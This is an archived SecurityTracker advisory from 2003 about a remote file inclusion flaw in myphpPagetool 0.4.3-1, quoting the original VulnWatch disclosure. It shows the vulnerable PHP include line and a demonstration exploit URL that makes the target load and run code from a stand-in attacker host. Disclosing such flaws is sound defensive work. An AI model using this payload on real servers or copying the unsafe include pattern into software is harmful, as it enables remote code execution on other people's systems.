SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   myphpPagetool Vendors:   myphppagetool.sourceforge.net
myphpPagetool Include File Error Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1006029
SecurityTracker URL:  http://securitytracker.com/id/1006029
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 3 2003
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 0.4.3-1
Description:   An include file vulnerability was reported in myphpPagetool. A remote user can execute arbitrary shell commands on the target server.

Frog-m@n reported that several of the scripts include a file 'pt_config.inc'. If the 'register_globals=ON' is set, a remote user can specify a remote location for the 'pt_config.inc' file, causing the target server to execute the PHP code contained in that file. The PHP code may include operating system shell commands.

A demonstration exploit URL is provided:

http://[target]/doc/admin/index.php?ptinclude=http://[attacker]

In this demonstration exploit URL, the remote user's code in the file 'http://[attacker]/pt_config.inc' will be executed on the target server.

The affected files in /doc/admin/ include: index.php, help1.php, help2.php, help3.php, help4.php, help5.php, help6.php, help7.php, help8.php, and help9.php.

Impact:   A remote user can execute arbitrary shell commands on the target server. The commands would run with the privileges of the web server.
Solution:   No vendor solution was available at the time of this entry. The author of the report has developed an unofficial patch, available at:

http://www.phpsecure.info/

Vendor URL:  myphppagetool.sourceforge.net/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  [VulnWatch] myphpPagetool (php)



Informations :
Version : 0.4.3-1
Website : http://myphppagetool.sourceforge.net/
Problem : Include file


PHP Code/Location :
In /doc/admin/, in the files index.php, help1.php, help2.php, help3.php, 
help4.php, help5.php, help6.php, help7.php, help8.php and help9.php :

----------------------------------------
<?php
include ($ptinclude . "/pt_config.inc");
[...]
----------------------------------------




Exploit :
http://[target]/doc/admin/index.php?ptinclude=http://[attacker]
with :
http://[attacker]/pt_config.inc

(if registers_global=ON)


Solution :
A patch has been published on http://www.phpsecure.info .


More details :
In French :
http://www.frog-man.org/tutos/myphpPagetool.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FmyphpPagetool.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools


frog-m@n


_________________________________________________________________
MSN Search, le moteur de recherche qui pense comme vous !  
http://search.fr.msn.be



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC